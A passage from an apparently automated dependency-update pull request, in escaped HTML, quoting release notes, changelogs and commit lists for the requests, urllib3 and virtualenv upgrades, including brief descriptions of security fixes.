(2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.25.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.4 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 (2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.4...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.2.1 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's 